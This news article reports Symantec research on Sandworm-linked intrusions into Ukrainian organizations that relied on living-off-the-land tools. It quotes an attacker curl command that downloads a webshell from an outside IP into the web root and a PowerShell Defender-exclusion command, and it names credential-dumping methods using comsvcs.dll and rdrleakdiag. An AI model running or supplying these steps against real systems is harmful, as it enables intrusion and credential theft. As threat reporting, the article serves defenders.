Ukrainian government organizations continue facing relentless cyber threats from Russian-backed threat actors employing sophisticated evasion techniques to maintain persistent network access.
Recent investigations have uncovered coordinated campaigns targeting critical infrastructure and government entities, with attackers deploying advanced tactics that circumvent traditional security defenses.
These operations represent a significant escalation in targeting strategies, focusing on credential harvesting and sensitive information extraction rather than immediate destructive capabilities.
The attacks demonstrate a strategic shift toward prolonged dwell time within networks, enabling threat actors to conduct extensive reconnaissance and maintain covert presence for months.
Symantec analysts and researchers identified two major intrusion incidents spanning a two-month operation against a large business services organization and a week-long campaign against local government infrastructure.
The attackers demonstrate exceptional operational security awareness, minimizing malware deployment while relying primarily on legitimate Windows administration tools and dual-use utilities to avoid detection.
The campaign appears linked to Sandworm, a Russian military intelligence unit under the GRU known for destructive attacks against critical infrastructure including power grids and satellite communications networks.
Initial compromise occurred through webshell deployment on public-facing servers, likely exploiting unpatched vulnerabilities. Attackers utilized Localolive webshell for establishing persistent backdoor access, enabling remote command execution capabilities.
Living-Off-the-Land Credential Harvesting Mechanisms
The sophisticated evasion methodology employed by these threat actors reveals their understanding of modern security implementations.
Upon gaining initial access on June 27, 2025, attackers immediately executed reconnaissance commands using built-in Windows utilities:-
cmd.exe /c curl 185.145.245.209:22065/service.aspx > C:\inetpub\wwwroot\aspnet_client\service.aspx
powershell Add-MpPreference -ExclusionPath CSIDL_PROFILE\downloads
Attackers deliberately disabled Windows Defender scanning on the Downloads folder, requiring administrative privileges.
They subsequently created scheduled tasks executing every thirty minutes using legitimate rundll32.exe with comsvcs.dll to perform memory dumps, extracting credentials stored in process memory.
The threat actors specifically targeted KeePass password vault processes through enumeration commands, demonstrating precise targeting of credential repositories.
Advanced evasion continued through utilization of Windows Resource Leak Diagnostic tool (rdrleakdiag) for memory dumping operations, a seldom-used technique designed to evade security monitoring systems.
Registry hive exfiltration through native reg.exe commands enabled additional credential and configuration data extraction.
The campaign showcases threat actors prioritizing stealth over speed, employing legitimate administration tools to maintain attribution ambiguity while systematically harvesting sensitive organizational data throughout extended network access periods.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post Russian Hackers Attacking Government Entity Using Stealthy Living-Off-the-Land Tactics appeared first on Cyber Security News.
